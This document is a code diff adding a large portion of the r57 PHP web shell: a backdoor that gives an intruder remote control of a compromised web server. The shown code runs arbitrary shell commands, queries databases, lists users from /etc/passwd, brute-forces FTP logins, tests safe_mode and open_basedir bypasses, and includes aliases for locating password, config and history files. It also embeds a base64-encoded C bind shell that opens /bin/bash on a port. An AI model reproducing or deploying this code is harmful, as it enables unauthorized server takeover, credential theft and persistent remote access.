+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'                   ',
+'ru_text2' =>'                            ',
+'ru_text3' =>'                 ',
+'ru_text4' =>'                  ',
+'ru_text5' =>'                         ',
+'ru_text6' =>'              ',
+'ru_text7' =>'      ',
+'ru_text8' =>'              ',
+'ru_butt1' =>'         ',
+'ru_butt2' =>'         ',
+'ru_text9' =>'                                /bin/bash',
+'ru_text10'=>'            ',
+'ru_text11'=>'                  ',
+'ru_butt3' =>'       ',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-     ',
+'ru_text14'=>'    ',
+'ru_butt4' =>'         ',
+'ru_text15'=>'                                    ',
+'ru_text16'=>'            ',
+'ru_text17'=>'              ',
+'ru_text18'=>'              ',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'            ',
+'ru_text21'=>'         ',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'              ',
+'ru_text24'=>'              ',
+'ru_text25'=>'              ',
+'ru_text26'=>'            ',
+'ru_butt5' =>'         ',
+'ru_text28'=>'         safe_mode',
+'ru_text29'=>'               ',
+'ru_butt6' =>'       ',
+'ru_text30'=>'              ',
+'ru_butt7' =>'       ',
+'ru_text31'=>'              ',
+'ru_text32'=>'           PHP     ',
+'ru_text33'=>'                                        open_basedir               cURL',
+'ru_butt8' =>'         ',
+'ru_text34'=>'                                        safe_mode               include',
+'ru_text35'=>'                                        safe_mode                        mysql',
+'ru_text36'=>'     .        ',
+'ru_text37'=>'     ',
+'ru_text38'=>'      ',
+'ru_text39'=>'    ',
+'ru_text40'=>'                        ',
+'ru_butt9' =>'    ',
+'ru_text41'=>'                 ',
+'ru_text42'=>'                    ',
+'ru_text43'=>'                  ',
+'ru_butt10'=>'         ',
+'ru_butt11'=>'             ',
+'ru_text44'=>'                               !                         !',
+'ru_text45'=>'             ',
+'ru_text46'=>'         phpinfo()',
+'ru_text47'=>'                  php.ini',
+'ru_text48'=>'                         ',
+'ru_text49'=>'                          ',
+'ru_text50'=>'                       ',
+'ru_text51'=>'                   ',
+'ru_text52'=>'                ',
+'ru_text53'=>'              ',
+'ru_text54'=>'                     ',
+'ru_butt12'=>'     ',
+'ru_text55'=>'               ',
+'ru_text56'=>'                 ',
+'ru_text57'=>'       /            /          ',
+'ru_text58'=>'   ',
+'ru_text59'=>'    ',
+'ru_text60'=>'          ',
+'ru_butt13'=>'       /       ',
+'ru_text61'=>'           ',
+'ru_text62'=>'                  ',
+'ru_text63'=>'           ',
+'ru_text64'=>'                  ',
+'ru_text65'=>'       ',
+'ru_text66'=>'       ',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'       ',
+'ru_text69'=>'        1',
+'ru_text70'=>'        2',
+'ru_text71'=>"                       :\r\n-     CHOWN -                                 UID (      ) \r\n-             CHGRP -                GID (      ) \r\n-             CHMOD -                                          (         0777)",
+'ru_text72'=>'                ',
+'ru_text73'=>'              ',
+'ru_text74'=>'               ',
+'ru_text75'=>'*                                        ',
+'ru_text76'=>'                                        find',
+'ru_text80'=>'   ',
+'ru_text81'=>'    ',
+'ru_text82'=>'           ',
+'ru_text83'=>'           SQL        ',
+'ru_text84'=>'SQL       ',
+'ru_text85'=>'                                        safe_mode                           MSSQL        ',
+'ru_text86'=>'                          ',
+'ru_butt14'=>'       ',
+'ru_text87'=>'                               ftp-       ',
+'ru_text88'=>'FTP-      :    ',
+'ru_text89'=>'        ftp        ',
+'ru_text90'=>'              ',
+'ru_text91'=>'              ',
+'ru_text92'=>'             ',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-        ',
+'ru_text95'=>'                    ',
+'ru_text96'=>'                                        ',
+'ru_text97'=>'                    : ',
+'ru_text98'=>'                   : ',
+'ru_text99'=>'*                                                             /etc/passwd',
+'ru_text100'=>'                                       ',
+'ru_text101'=>'                                (user -> resu)                                   ',
+'ru_text102'=>'     ',
+'ru_text103'=>'               ',
+'ru_text104'=>'                               ',
+'ru_text105'=>'    ',
+'ru_text106'=>'  ',
+'ru_text107'=>'    ',
+'ru_butt15'=>'         ',
+'ru_text108'=>'            ',
+'ru_text109'=>'        ',
+'ru_text110'=>'          ',
+'ru_text111'=>'SQL-       :     ',
+'ru_text112'=>'                                        safe_mode                             mb_send_mail',
+'ru_text113'=>'                                        safe_mode,                                               imap_list',
+'ru_text114'=>'                                        safe_mode,                                             imap_body',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+);
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray> </font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '      !                         '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '      !                        '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "                   "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function fe($l,$n)
+{
+$text['ru']  = array('                          ftp        ','                      ftp        ','                                  ftp        ');
+$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function mr($l,$n)
+{
+$text['ru']  = array('                           ','                 ');
+$text['eng'] = array('Can\'t send mail','Mail sent');
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
